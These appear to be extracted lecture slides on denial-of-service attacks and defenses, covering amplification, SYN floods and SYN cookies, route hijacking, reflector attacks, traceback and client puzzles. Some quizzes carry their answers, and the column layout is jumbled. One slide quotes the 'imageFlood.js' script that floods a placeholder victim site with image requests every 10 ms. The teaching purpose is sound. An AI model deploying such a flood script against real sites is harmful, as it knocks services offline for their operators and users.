DOS Taxonomy: Quiz One

Match the DOS attack classification with its description.

Attacks: Descriptions:
4 Random Scanning 1. A portion of a list of targets is supplied to
a compromised computer.
2 Permutation Scanning
2. All compromised computers share a
3 Signpost Scanning
common pseudo-random permutation of the
1 Hitlist Scanning IP address space.
3. Uses the communication patterns of the
compromised computer to find new target.
4. Each compromised computer probes
random addresses.
 DOS Taxonomy: Quiz Two
Match the DOS attack classification with its description.

Attacks: Descriptions:
1. Generate 32-bit numbers and stamp
2 Subnet Spoofing
packets with them.
1 Random Spoofing
2. Generate random addresses within
3 Fixed Spoofing a given address space.
3. The spoofed address is the address
of the target.
 DOS Taxonomy: Quiz Three
Match the DOS attack classification with its description.

Attacks: Descriptions:
2 Server Application 1. The motivation of this attack is a
crucial service of a global internet
3 Network Access
operation, for example core router
1 Infrastructure
2. The attack is targeted to a specific
application on a server
3. The attack is used to overload or
crash the communication mechanism of a
network.
 Network DoS:

Goal: take out a large site with little computing

How:
Amplification
Small number of packets

BIG EFFECT
 Network DoS:

Two types of amplification attacks:

DoS bug: DoS flood:

Design flaw allowing one Command botnet to

Machine to disrupt a service Generate flood of requests
 Network DoS:
DoS can happen at any layer

Sample DoS at different layers:

Link
TCP/UDP
Application

Sad truth: Current internet not designed to handle DDoS attacks

Amplification Quiz
NTP – Network Time
Protocol

Used to synchronize
machines and their
clocks.
 Amplification Quiz
Which of these are reasons why the UDP-based NTP
protocol is particularly vulnerable to amplification attacks?
Select all that are true.

A small command can generate a large response.

Vulnerable to source IP spoofing.

It is difficult to ensure computers communicate only with

legitimate NTP severs.
 Amplification Example
Amplification Attack!
 Amplification Example
March 2013 DNS Amplification attack: (x50 amplification)
DnS Query EDNS Response
v Target
SrcIP: DoS
v
(3000 bytes)
(60 bytes)

DoS DoS
Source Target
DNS Server

2006: 0.58M open resolvers on Internet (Kaminsky-Shiffman)

2014: 28M open resolvers (openresolverproject.org)

March 2013: DDoS attack generating 309 Gbps for 28 mins

 IP Header Format
Version Header Length
Type of Service
Connectionless
Total Length
Identification
Flags Fragment Offset
Time to Live
Unreliable Protocol
Header Checksum
Source Address of Originating Host
Destination Address of Target Host
Best Effort Options
Padding
IP Data
 TCPHeader Format

Session Source Port Dest Port

Based
SEQ Number
ACK Number
Congestion U A P P S F
control R C S S Y I
G K H R N N

Other stuff
In order
delivery
 TCP Handhake
C S
SNC randC
SYN:
ANC 0 Listening

SNS randS
SYN/ACK: Store SNC, SNS
ANS SNC +1

SNC SNC +1
ACK: Wait
AN SNS +1

Established
 TCP SYN Flood I: low rate (DoS Bug)
C S
Single machine:
SYNC1
SYN Packets with random SYNC2
source IP addresses
SYNC3
Fills up backlog queue on server
SYNC4
No further connections possible
SYNC5
 TCP SYN Flood I
A classic SYN flood example

MS Blaster worm (2003) MS Solution

new name:
Infected machines at noon on Aug 16th: windowsupdate.microsoft.com
SYN flood on port 80 to windowsupdate.com
50 SYN packets every second
each packet is 40 bytes
Spoofed source IP: a.b.X.Y where X,Y random
 TCP SYN Flood I

Low rate SYN flood defenses

Non-solution: Correct Solution:

Increase backlog queue size Syncookies: remove state from

or decrease timeout server

Small performance overhead

 SYN COOKIES

Idea: use secret key and data in packet to generate server SN

Server responds to Client with SYN-ACK cookie: Honest client responds with
ACK ( AN=SNS +1, SN=SNC+1 ):
T = 5-bit counter incremented every 64 secs.
L = MACkey (SAddr, SPort, DAddr, DPort, SNC, T) Server allocates space for
[24 bits] socket only if valid SNS
key: picked at random during boot
SNS = (T . mss . L) ( |L| = 24 bits )
Server does not save state
 Syn Cookies Quiz
Select all the true statements:
SYN cookies require modified versions of TCP

SYN cookies lead to overall slower performance

The server must reject all TCP options because the server
discards the SYN queue entry
 SYN Floods II: Massive flood

Command bot army to flood specific target: (DDoS)

20,000 bots can generate 2Gb/sec of SYNs (2003)

At web site:
Saturates network uplink or network router
Random source IP attack SYNs look the
same as real SYNs
 SYN Floods II: Massive flood
Prolexic / CloudFlare

Idea: only forward established TCP connections to site

Lots-of-SYNs

Lots-of-SYN/ACKs Prolexic Forward

Proxy to site
Fewer ACKs
 Stronger attacks: TCP connection flood

Command bot army:

Complete TCP connection to web site

Send short HTTP HEAD request
Repeat
Will bypass SYN flood protection proxy but:

Attacker can no longer use random source IPs

Reveals location of bot zombies
Proxy can now block or rate-limit bots
 A real-world example: GitHub(3/2015)

Javascript-based DDoS:

Github.com

Inject
Honest End Popular
imageFlood.js
User Server
 A real-world example: GitHub(3/2015)
imageFlood.js
Function imgflood() {
var TARGET = ‘victim-website.com/index.php?’
var rand = Math.floor(Math.random() * 1000)
var pic = new Image()
Pic.src = ‘http://’+TARGET+rand+’=val’
}
setInterval(imgflood,10)
 Flood Attack Quiz
With regards to a UDP flood attack, which of the
following statements are true:

Attackers can spoof the IP address of their UDP packets

The attack can be mitigated using firewalls

Firewalls cannot stop a flood because the firewall is

susceptible to flooding.
DoS via route hijacking
3491, 17557
AS 3327 208.65.153.0/24 AS 3491
Linx PCCW
Telecom
17557
AS 25462 208.65.153.0/24
RETN Ltd AS 17557
Pakistan
Telcom

AS 36561 AS 18173
AS 18173 AS 58467
YouTube Allied Bank Lahore Stock Aga Khan
AS 365561
208.65.153.0/22 Pakistan Exchange University
Includes 210 IP Addr
 DoS via route hijacking DETOUR

Timeframe:

100% at 10:30am

0% at 10:45am
 DoS via route hijacking DETOUR

China Telecom, China Telecom – DC, China Telecom – DC

66.174.161.0/24

Level 3, Verizon, Verizon-W., Verizon-W.

66.174.161.0/24

LEGEND
LEVEL 3
PEER
CUSTOMER
NETWORK TRAFFIC
 DoS at Higher Levels

SSL/TLS handshake [SD’03]

Client Hello

Server Hello (pub-key)

Client key exchange

RSA RSA
Encrypt Decrypt
 DoS Mitigation
Client puzzles

Moderately hard problem: Idea: slow down

attacker
Given challenge C find X such that
LSBn ( SHA-1( C || X ) ) = 0n
Assumption: takes expected 2n time to solve
For n=16 takes about .3sec on 1Ghz machine

Main point: checking puzzle solution is easy.

 DoS Mitigation
Client puzzles

During DoS attack: When no attack:

Everyone must submit Do not require puzzle
puzzle solution with solution
requests
 DoS Mitigation
Client puzzles: Examples

TCP connection floods (RSA ‘99)

Example challenge: C = TCP server-seq-num

First data packet must contain puzzle solution
Otherwise TCP connection is closed
 DoS Mitigation
Client puzzles: Examples

SSL handshake DoS: (SD’03)

Challenge C based on TLS session ID

Server: check puzzle solution before RSA decrypt

Same for application layer DoS and payment DoS

 DoS Mitigation
Client puzzles: Benefits and limitations

Hardness of challenge: n

Decided based on DoS attack volume

Limitations:
Requires changes to both clients and servers
Hurts low power legitimate clients during attack:
Clients on cell phones and tablets cannot connect
 DoS Mitigation
Client puzzles: Memory-bound functions

CPU power ratio:

high end server / low end cell phone = 8000

Impossible to scale to hard puzzles

Interesting observation:
Main memory access time ratio:
high end server / low end cell phone = 2
 DoS Mitigation
Better puzzles

Solution requires many main memory accesses

Dwork-Goldberg-Naor, Crypto ‘03

Abadi-Burrows-Manasse-Wobber, ACM ToIT ‘05

 Puzzle Quiz

Which of the following statements are true?

Client puzzles should be hard to construct. This is an

indication of the level of difficulty to solve them.

Client puzzles should be stateless

Puzzle complexity should increase as the strength of the

attack increases.
 DoS Mitigation - CAPTCHAs
CAPTCHA
Completely Automated Public Turing test to tell Computers and Humans Apart

Idea: verify that

connection is from
a human

Are you
human?
 DoS Mitigation - CAPTCHAs
CAPTCHA
Completely Automated Public Turing test to tell Computers and Humans Apart

Applies to application layer Idea: verify that

DDoS [Killbots ’05]
connection is from
During attack: generate a human
CAPTCHAs and process request
only if valid solution
Present one CAPTCHA per source IP address
DoS Mitigation: Source Identification

Goal: identify packet source

Ultimate goal: block attack at the source

 DoS Mitigation: Source Identification
Ingress Filtering

ISP

Internet
 DoS Mitigation: Source Identification
Ingress Filtering
Drop all packets with source address
other than 204.69.207.0/24

Internet
204.69.207.0/24

Ingress filtering policy: ISP only forwards packets with legitimate source IP
 DoS Mitigation: Source Identification
Ingress Filtering - Implementation problems

ALL ISPs must do this. Requires global trust.

If 10% of ISPs do not implement no defense
No incentive for deployment Recall: 309 Gbps
attack used only
2014: 3 networks (3/2013)

25% of Auto. Systems are fully spoofable (spoofer.cmand.org)

13% of announced IP address space is spoofable
 DoS Mitigation: Traceback
Traceback [Savage et al. ’00]

Goal:
How: change routers to
Given set of attack packets record info in packets
Determine path to source

Assumptions:
Most routers remain uncompromised
Attacker sends many packets
Route from attacker to victim remains relatively stable
 DoS Mitigation: Traceback
Simple Method:

Write path into network packet:

Each router adds its own IP address to packet
Victim reads path from packet

Problems:
Requires space in packet
Path can be long
No extra fields in current IP format
Changes to packet format too much to expect
 DoS Mitigation: Traceback
Better Idea

DDoS involves many packets on same path

Store one link in each packet

Each router probabilistically stores
own address
Fixed space regardless of path length
 Traceback Quiz
Which of the following are assumptions that can be
made about Traceback?

Attackers can generate limited types of packets

Attackers may work alone or in groups

Attackers are not aware of the tracing mechanism

 DoS Mitigation: Edge Sampling

Data fields written to packet:

Edge: start and end IP addresses

Distance: number of hops since edge stored
 DoS Mitigation: Edge Sampling
Marking procedure for router R:

if coin turns up heads (with

probability p) then
else

write R into start address if distance == 0 write R into

write 0 into distance field end field
increment distance field
 DoS Mitigation: Edge Sampling

Packet received

R1 receives packet from source or another router

Packet contains space for start, end, distance

Packet s e d

R1 R2 R3
 DoS Mitigation: Edge Sampling

Begin writing edge

R1 chooses to write start of edge

Sets distance to 0

Packet R1 0

R1 R2 R3
 DoS Mitigation: Edge Sampling

Finish writing edge

R2 chooses not to overwrite edge
Distance is 0
Write end of edge, increment distance to 1

Packet R1 R2 1

R1 R2 R3
 DoS Mitigation: Edge Sampling

Increment distance
R3 chooses not to overwrite edge
Distance > 0
Increment distance to 2

Packet R1 R2 2

R1 R2 R3
 DoS Mitigation: Edge Sampling

Path reconstruction
Extract information from attack packets
Build graph rooted at victim
Each (start,end,distance) tuple provides an edge
# packets needed to reconstruct path

E(X) < In(d)

p(1-p)d-1
where p is marking probability, d is length of path
 Edge Sampling Quiz
Select all the statements that are true for edge
sampling:

Multiple attackers can be identified since edge identifies

splits in reverse path

It is difficult for victims to reconstruct a path to the attacker

Requires space in the IP packet header

 Reflector Attack [Paxson ’01]

Victim is flooded by all of the data Attacker spoof’s Victim’s IP and sends
3 sent from the DNS Servers 1 DNS query to many DNS Servers

2 All DNS servers respond to the DNS

query and send data to Victim’s IP
 Reflector Attack [Paxson ’01]

Examples:

DNS Resolvers: UDP 53 with victim.com source

At victim: DNS response
Web servers: TCP SYN 80 with victim.com source
At victim: TCP SYN ACK packet
Gnutella servers
 Reflector Attack [Paxson ’01]
Request:src=victim, reply:src=reflector
det=reflector det=vitim

VICTIM

MASTER
Reflectors
Control traffic send streams
Directs slaves of non-spoofed
at victim, but unsolicited
reflectors traffic to
victim.
 Reflector Attack Quiz
Self defense against reflector attacks should
incorporate:
Filtering - filter DNS traffic as close to the victim as
possible.

Server redundancy - servers should be located in multiple

networks and locations.

Traffic limiting - traffic from a name server should be limited

to reasonable thresholds.
 Capability Based Defense

Preventing internet denial-of-service

Anderson, Roscoe, Wetherall
with capabilities. SIGCOMM ‘04.

Siff: A stateless internet flow filter to

Yaar, Perrig, and Song mitigate DDoS flooding attacks. IEEE
S&P ’04.

A DoS-limiting network architecture.

Yang, Wetherall, Anderson
SIGCOMM ’05
 Capability Based Defense

Basic idea:
Receivers can specify what packets they want

How:

Sender requests capability in SYN packet

Path identifier used to limit # reqs from one source
Receiver responds with capability
Sender includes capability in all future packets
 Capability Based Defense

Main point: Routers only forward:

Request packets, and
Packets with valid capability
Capabilities can be revoked if source is attacking
Blocks attack packets close to source

R1 R2 R3 R4
DEST
Source As Transit As Dest As
 DoS Summary

Denial of Service attacks are real.

Must be considered at design time.

Sad truth:
Internet is ill-equipped to handle DDoS attacks
Commercial solutions: CloudFlare, Prolexic

Many good proposals for Internet core redesign.